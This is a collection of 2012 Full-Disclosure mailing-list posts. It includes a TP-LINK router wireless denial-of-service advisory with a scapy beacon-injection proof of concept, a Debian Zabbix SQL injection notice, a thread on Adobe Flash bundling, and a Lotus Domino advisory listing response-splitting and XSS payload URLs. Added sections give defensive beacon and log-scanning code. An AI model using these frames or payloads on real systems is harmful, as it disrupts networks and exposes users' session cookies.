Re: [Full-disclosure] cloudsafe365 for wordpress: file disclosure
On Tue, Aug 28, 2012 at 09:59:19PM +1000, craig deveson wrote:
> Issue has been resolved in version 1.47

In which revision? This looks like the up-to-date repository: http://plugins.svn.wordpress.org/cloudsafe365-for-wp/

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Splunk Vulnerability
On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote:
> 1.) The tool, Splunk, is designed to index logs
> 2.) Logs are arbitrary files.
> Therefore,
> 3.) Splunk is designed to index arbitrary files.

Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself.
[Full-disclosure] TP-LINK TL-WR340G Wireless Denial of Service
=== intro ===

TP-LINK TL-WR340G is a SOHO router with an integrated IEEE 802.11b/g AP. It is now marked End-of-Life. Transmitting crafted frames in proximity of a working router causes the device to malfunction: wireless communication stops, existing clients don't receive frames from the AP (except beacons), and new clients can't connect.

=== details ===

Affected product: TL-WR340G Wireless router
Firmware Version: 4.7.11 Build 101102 Rel.60376n
Hardware Version: WR340G v3
Local/remote: Local (wirelessly)

The vulnerability can be reproduced by crafting and transmitting a frame with scapy:

    from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11Elt, sendp

    # broadcast beacon carrying the AP's own MAC as source and BSSID, with a single empty element
    fr = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2="<AP MAC>", addr3="<AP MAC>")/Dot11Beacon()/Dot11Elt()
    sendp(fr, iface="<injection capable wireless interface>", count=5)

An attacker could stop all wireless traffic. To resume AP functionality the user must restart the wireless interface in the WebGUI or restart the device.

=== time-line ===

2.08.2012 - vendor notified
4.09.2012 - no response from vendor, published
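A defender-side check suggested by the advisory above, added here as an example that is not part of the original post: a small pure-Python beacon parser and a fingerprint rule of the kind a wireless IDS runs, flagging beacons that claim the protected AP's BSSID but lack the elements a genuine beacon carries (the advisory's one-line scapy frame has exactly that shape: one empty SSID element and nothing else). The BSSID, SSID and channel in the baseline and the sample frames are constructed placeholders, not values from the advisory.

```python
"""Beacon fingerprint check: flag beacons that claim our AP's BSSID but do not look like its beacons."""
import struct

MGMT_HDR = 24       # frame control(2) duration(2) addr1(6) addr2(6) addr3(6) seq ctrl(2)
BEACON_FIXED = 12   # timestamp(8) beacon interval(2) capability(2)
IE_SSID, IE_RATES, IE_DS = 0, 1, 3   # element IDs a real beacon carries


def parse_beacon(frame):
    """Parse an 802.11 beacon without RadioTap header; raise ValueError when malformed."""
    if len(frame) < MGMT_HDR + BEACON_FIXED:
        raise ValueError("frame too short")
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0 or (fc0 >> 4) != 8:   # type 0 (management), subtype 8 (beacon)
        raise ValueError("not a beacon")
    timestamp, interval, capability = struct.unpack_from("<QHH", frame, MGMT_HDR)
    ies, off = {}, MGMT_HDR + BEACON_FIXED
    while off < len(frame):                          # information elements are ID, length, body
        if off + 2 > len(frame):
            raise ValueError("truncated IE header")
        eid, elen = frame[off], frame[off + 1]
        body = frame[off + 2:off + 2 + elen]
        if len(body) != elen:
            raise ValueError("truncated IE body")
        ies.setdefault(eid, []).append(body)
        off += 2 + elen
    return {"sa": frame[10:16], "bssid": frame[16:22], "timestamp": timestamp,
            "interval": interval, "capability": capability, "ies": ies}


def check_beacon(frame, baseline):
    """Return anomaly labels for a beacon claiming baseline['bssid']; [] if clean or foreign."""
    try:
        b = parse_beacon(frame)
    except ValueError as e:
        return ["malformed: " + str(e)]
    if b["bssid"] != baseline["bssid"]:
        return []                                    # someone else's AP: not this rule's job
    ies, anomalies = b["ies"], []
    if ies.get(IE_SSID, [None])[0] != baseline["ssid"]:
        anomalies.append("ssid_mismatch")
    if IE_RATES not in ies:
        anomalies.append("missing_supported_rates")
    ds = ies.get(IE_DS)
    if not ds or len(ds[0]) != 1:
        anomalies.append("missing_ds_param")
    elif ds[0][0] != baseline["channel"]:
        anomalies.append("channel_mismatch")
    if b["sa"] != baseline["bssid"]:
        anomalies.append("sa_bssid_mismatch")
    return anomalies


def build_beacon(bssid, ies, interval=100, capability=0x0411):
    """Pack a beacon for offline testing (constructed sample input, not captured traffic)."""
    header = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, interval, capability)
    body = b"".join(bytes([eid, len(v)]) + v for eid, v in ies)
    return header + fixed + body


AP_MAC = bytes.fromhex("020000000001")               # placeholder BSSID of the AP we watch
BASELINE = {"bssid": AP_MAC, "ssid": b"HomeNet", "channel": 6}
LEGIT = build_beacon(AP_MAC, [(IE_SSID, b"HomeNet"),
                              (IE_RATES, bytes([0x82, 0x84, 0x8B, 0x96])), (IE_DS, bytes([6]))])
# Same shape as the advisory's scapy frame: interval 100, no capabilities, one empty element.
MINIMAL = build_beacon(AP_MAC, [(IE_SSID, b"")], capability=0)

if __name__ == "__main__":
    for name, f in (("legit", LEGIT), ("minimal", MINIMAL), ("truncated", LEGIT + b"\x01\x04\x82")):
        print(name, check_beacon(f, BASELINE))
```

In a monitor-mode capture the RadioTap header must be stripped before the bytes reach parse_beacon; the rule is only as good as the baseline, so record it from a known-good beacon of the AP.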
Re: [Full-disclosure] Splunk Vulnerability
I agree. Splunk *IS* doing what it was designed to do.

--
Michael D. Wood
ITSecurityPros.org
www.itsecuritypros.org

From: JxT [mailto:jxt.li...@gmail.com]
Sent: Thursday, September 06, 2012 2:19 AM
To: Zach C.
Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Splunk Vulnerability

> On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote:
>> 1.) The tool, Splunk, is designed to index logs
>> 2.) Logs are arbitrary files.
>> Therefore,
>> 3.) Splunk is designed to index arbitrary files.
>
> Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself.
Re: [Full-disclosure] Splunk Vulnerability
Well, I'm glad we got multiple emails saying you all agree.

On Thu, Sep 6, 2012 at 8:50 AM, Michael D. Wood m...@itsecuritypros.org wrote:
> I agree. Splunk *IS* doing what it was designed to do.
>
> --
> Michael D. Wood
> ITSecurityPros.org
> www.itsecuritypros.org
>
> From: JxT [mailto:jxt.li...@gmail.com]
> Sent: Thursday, September 06, 2012 2:19 AM
> To: Zach C.
> Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Splunk Vulnerability
>
>> On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote:
>>> 1.) The tool, Splunk, is designed to index logs
>>> 2.) Logs are arbitrary files.
>>> Therefore,
>>> 3.) Splunk is designed to index arbitrary files.
>>
>> Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself.
[Full-disclosure] [SECURITY] [DSA 2539-1] zabbix security update
-------------------------------------------------------------------------
Debian Security Advisory DSA-2539-1                   secur...@debian.org
http://www.debian.org/security/                          Raphael Geissert
September 06, 2012                     http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package        : zabbix
Vulnerability  : SQL injection
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-3435
Debian Bug     : 683273

It was discovered that Zabbix, a network monitoring solution, does not properly validate user input used as a part of an SQL query. This may allow unauthenticated attackers to execute arbitrary SQL commands (SQL injection) and possibly escalate privileges.

For the stable distribution (squeeze), this problem has been fixed in version 1:1.8.2-1squeeze4.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in version 1:2.0.2+dfsg-1.

We recommend that you upgrade your zabbix packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
Re: [Full-disclosure] Splunk Vulnerability
And I'm sure glad you took the time to notice!

--
Michael D. Wood
ITSecurityPros.org
www.itsecuritypros.org

- Reply message -
From: Benji m...@b3nji.com
To: Michael D. Wood m...@itsecuritypros.org
Cc: JxT jxt.li...@gmail.com, Zach C. fxc...@gmail.com, full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Splunk Vulnerability
Date: Thu, Sep 6, 2012 4:53 am

> Well, I'm glad we got multiple emails saying you all agree.
>
> On Thu, Sep 6, 2012 at 8:50 AM, Michael D. Wood m...@itsecuritypros.org wrote:
>> I agree. Splunk *IS* doing what it was designed to do.
>>
>> --
>> Michael D. Wood
>> ITSecurityPros.org
>> www.itsecuritypros.org
>>
>> From: JxT [mailto:jxt.li...@gmail.com]
>> Sent: Thursday, September 06, 2012 2:19 AM
>> To: Zach C.
>> Cc: Michael D. Wood; full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Splunk Vulnerability
>>
>>> On Wed, Sep 5, 2012 at 11:30 PM, Zach C. fxc...@gmail.com wrote:
>>>> 1.) The tool, Splunk, is designed to index logs
>>>> 2.) Logs are arbitrary files.
>>>> Therefore,
>>>> 3.) Splunk is designed to index arbitrary files.
>>>
>>> Agreed, Splunk is doing exactly what it's designed to do. This is not a vulnerability within Splunk itself.
[Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.

The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.

It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.

[1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
[2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
[3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
[4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/

attachment: adobe-flash-install-shit.png
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86?

T

Sent from whatever device will keep us from debating which one is better.

On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote:
> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>
> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>
> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>
> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
> [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
> [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>
> adobe-flash-install-shit.png
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Was this on Windows or Linux? I did the update on Linux and of course just got the update. Was there an option for Manual/Automatic update? If so, always choose manual and remove the extras!

Gary Baribault
Courriel: g...@baribault.net
GPG Key: 0x685430d1
Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1

On 09/06/2012 01:18 PM, Thor (Hammer of God) wrote:
> FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86?
>
> T
>
> Sent from whatever device will keep us from debating which one is better.
>
> On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote:
>> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>>
>> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>>
>> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>>
>> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>> [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>> [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>>
>> adobe-flash-install-shit.png
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Hi Thor,

This is a corporate laptop, and it needs Flash periodically. An Adobe update process runs on occasion, prompting to install the update.

> Actually, there wasn't even an option for other bits.

I did not have the option either.

Jeff

On Thu, Sep 6, 2012 at 1:18 PM, Thor (Hammer of God) t...@hammerofgod.com wrote:
> FYI, I updated as well, and only received the Flash bits. Actually, there wasn't even an option for other bits. It asked me at the end if I wanted auto, notify, or no update options but that was it. This was x86?
>
> T
>
> Sent from whatever device will keep us from debating which one is better.
>
> On Sep 6, 2012, at 10:09 AM, Jeffrey Walton noloa...@gmail.com wrote:
>> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>>
>> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>>
>> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>>
>> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>> [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>> [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
>>
>> adobe-flash-install-shit.png
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
On Thu, Sep 6, 2012 at 1:26 PM, James Lay j...@slave-tothe-box.net wrote:
> On 2012-09-06 11:09, Jeffrey Walton wrote:
>> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>>
>> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>>
>> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>> [SNIP]
>
> Perhaps someone didn't uncheck the checkbox on download

Fortunately, I still had the browser window open (that was opened by the update process): https://get3.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer. No check boxes - only instructions to install.

Jeff
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Uhh, I had to update a Windows box just the other day and it didn't install any toolbars or anything like that. Might wanna start running a few scans..

On Sep 6, 2012 10:42 AM, Jeffrey Walton noloa...@gmail.com wrote:
> On Thu, Sep 6, 2012 at 1:26 PM, James Lay j...@slave-tothe-box.net wrote:
>> On 2012-09-06 11:09, Jeffrey Walton wrote:
>>> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>>>
>>> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>>>
>>> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>>> [SNIP]
>>
>> Perhaps someone didn't uncheck the checkbox on download
>
> Fortunately, I still had the browser window open (that was opened by the update process): https://get3.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer . No check boxes - only instructions to install.
>
> Jeff
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Yeah. +1 Troll. (and I don't even like Adobe!)

On Thu, Sep 6, 2012 at 7:09 PM, Jeffrey Walton noloa...@gmail.com wrote:
> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>
> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>
> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>
> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
> [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
> [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 91, Issue 9
Over the years I've done dozens (at least) of Adobe Flash updates on behalf of my employer. I'm not currently in a position to verify by experimentation, but my experience has been that under some (relatively infrequent) circumstances that check box is suppressed, or nonexistent. In those cases, the browser tool-bar (along with any other crapware that Adobe has solicited bribes to distribute) is installed without explicit opt-in.

S. Miller

Subject: Full-Disclosure Digest, Vol 91, Issue 9

Message: 6
Date: Thu, 06 Sep 2012 11:26:54 -0600
From: James Lay j...@slave-tothe-box.net
Subject: Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
To: full-disclosure@lists.grok.org.uk
Message-ID: 0e839c3f7588f803ead063cadad95e47@localhost
Content-Type: text/plain; charset=utf-8

...
> Perhaps someone didn't uncheck the checkbox on download
...

End of Full-Disclosure Digest, Vol 91, Issue 9
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
> It appears Adobe has become a whore to Google like Mozilla.

Got hit offlist for this one. I'd better cite this one, too.

https://www.google.com/#sclient=psy-ab&q=mozilla+google+deal
https://www.google.com/#sclient=psy-ab&q=mozilla+google+irs

Mozilla almost lost their non-profit status because they made so much money from Google.

On Thu, Sep 6, 2012 at 1:09 PM, Jeffrey Walton noloa...@gmail.com wrote:
> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>
> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>
> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>
> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
> [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
> [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
Re: [Full-disclosure] [funsec] Adobe Flash UpdateInstalls Other Warez without Consent
On Thu, Sep 6, 2012 at 2:55 PM, Skyler King sk...@checkpoint.com wrote:
> Don't forget about your Java security updates installing McAfee Security Center.

Or Java and Ask.com

> -Original Message-
> From: funsec-boun...@linuxbox.org [mailto:funsec-boun...@linuxbox.org] On Behalf Of Jeffrey Walton
> Sent: Thursday, September 06, 2012 11:19 AM
> To: FunSec List
> Cc: Full Disclosure; BugTraq
> Subject: Re: [funsec] Adobe Flash UpdateInstalls Other Warez without Consent
>
>> It appears Adobe has become a whore to Google like Mozilla.
>
> Got hit offlist for this one. I'd better cite this one, too.
>
> https://www.google.com/#sclient=psy-ab&q=mozilla+google+deal
> https://www.google.com/#sclient=psy-ab&q=mozilla+google+irs
>
> Mozilla almost lost their non-profit status because they made so much money from Google.
>
> On Thu, Sep 6, 2012 at 1:09 PM, Jeffrey Walton noloa...@gmail.com wrote:
>> The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar.
>>
>> The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes.
>>
>> It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
>>
>> [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
>> [2] http://web.nvd.nist.gov/view/vuln/search-results?query=adobe&search_type=all&cves=on
>> [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
>> [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
Re: [Full-disclosure] [funsec] Adobe Flash UpdateInstalls Other Warez without Consent
On Thursday, September 06, 2012 02:59:33 PM Jeffrey Walton wrote:
> Or Java and Ask.com

or nmap and download.com...
[Full-disclosure] HTTP Response Splitting and XSS vulnerabilities in IBM Lotus Domino
Hello list!

I want to warn you about HTTP Response Splitting and Cross-Site Scripting vulnerabilities in IBM Lotus Domino. On 15th of August IBM released the advisory concerning these Cross-Site Scripting vulnerabilities. CVE ID: CVE-2012-3301.

- Affected products: -

Vulnerable are IBM Lotus Domino 8.5.3 and previous versions. These vulnerabilities will be fixed in Domino 8.5.4, and IBM are still working on other vulnerabilities about which I've informed them. For fixes, workarounds and mitigations refer to the IBM Security Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21608160

-- Details: --

HTTP Response Splitting (WASC-25):

http://site/servlet/%0AHeader:value%0A1

Cross-Site Scripting (WASC-08):

Will work in different browsers (in the case of Mozilla Firefox it will work in versions before Firefox 3.0.9):

http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1

Will work in all versions of Firefox, but without access to cookies:

http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1

The Location header can also be used for an XSS attack (with its own nuances in different browsers).

Cross-Site Scripting (WASC-08):

The attack is possible via data: and vbscript: URIs.

http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

In x.nsf, x is the username of the logged-in user.

Timeline:

The full timeline can be read in the first advisory (http://securityvulns.ru/docs28474.html).

- During 16.05-20.05 I wrote announcements about multiple vulnerabilities in IBM software at my site.
- During 16.05-20.05 I wrote five advisories via the contact form at IBM's site.
- At 31.05 I resent five advisories to IBM PSIRT, which they received and said they would send to the developers (of Lotus products).
- At 15.08 IBM released their advisory (about Cross-Site Scripting and HTTP Response Splitting holes - just a few of the total number of holes).
- At 28.08.2012 I disclosed these vulnerabilities (second advisory) at my site (http://websecurity.com.ua/5839/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
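As an added example (not from the advisory, MustLive or IBM), a Python scanner that runs over constructed web-server access-log lines and flags the two request shapes described above: an encoded line break in the path followed by a header line (response splitting, with a Refresh or Location target on a script-bearing scheme), and a frameset Src= parameter carrying a data:, javascript: or vbscript: URI. The NCSA log format, the 192.0.2.x addresses and the alice.nsf mailbox name are assumptions for the sample input.

```python
"""Scan access-log lines for Domino-style response splitting and URI-scheme XSS attempts."""
import re
from urllib.parse import parse_qs, unquote

# NCSA-style request line; the sample log below is constructed, not a real Domino log.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")   # a header line smuggled via %0A
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
DANGEROUS_SCHEMES = {"javascript", "data", "vbscript"}        # schemes the advisory abuses
REDIRECT_HEADERS = {"refresh", "location"}                    # headers that send the browser elsewhere


def uri_scheme(value):
    m = SCHEME_RE.match(value.strip())
    return m.group(1).lower() if m else ""


def classify_request(target):
    """Return finding labels for one request target (path plus query) as it appears in the log."""
    findings = []
    path, _, query = target.partition("?")
    lines = re.split(r"\r\n|\r|\n", unquote(path))
    if len(lines) > 1:
        findings.append("response_splitting:crlf_in_path")
        for line in lines[1:]:                 # text after the break lands in the response headers
            m = HEADER_RE.match(line)
            if not m:
                continue
            name, value = m.group(1), m.group(2)
            findings.append(f"injected_header:{name}")
            url = re.search(r"url=(.*)", value, re.I)   # Refresh: 0;URL=<uri>
            uri = url.group(1) if url else value        # Location: <uri>
            if name.lower() in REDIRECT_HEADERS and uri_scheme(uri) in DANGEROUS_SCHEMES:
                findings.append(f"xss_via_{name.lower()}_header")
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:                        # e.g. Src=data:... in a Domino OpenFrameSet URL
            if uri_scheme(v) in DANGEROUS_SCHEMES:
                findings.append(f"xss_uri_scheme:{key}={uri_scheme(v)}")
    return findings


def scan_log(text):
    """Return one hit per log line whose request target produced findings."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "target": m.group("target"), "findings": findings})
    return hits


SAMPLE_LOG = """\
192.0.2.10 - - [28/Aug/2012:10:00:01 +0300] "GET /servlet/%0AHeader:value%0A1 HTTP/1.1" 200 512
192.0.2.11 - - [28/Aug/2012:10:00:02 +0300] "GET /servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1 HTTP/1.1" 200 512
192.0.2.12 - - [28/Aug/2012:10:00:03 +0300] "GET /mail/alice.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B HTTP/1.1" 200 2048
192.0.2.13 - - [28/Aug/2012:10:00:04 +0300] "GET /mail/alice.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=/mail/alice.nsf/Inbox?OpenView HTTP/1.1" 200 2048
192.0.2.14 - - [28/Aug/2012:10:00:05 +0300] "GET /servlet/report?q=a%3Ab HTTP/1.1" 200 100
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["findings"])
```

The relative Src= and the harmless a:b query value on the last two lines show the scheme check does not fire on ordinary Domino frameset links or on any colon in a parameter.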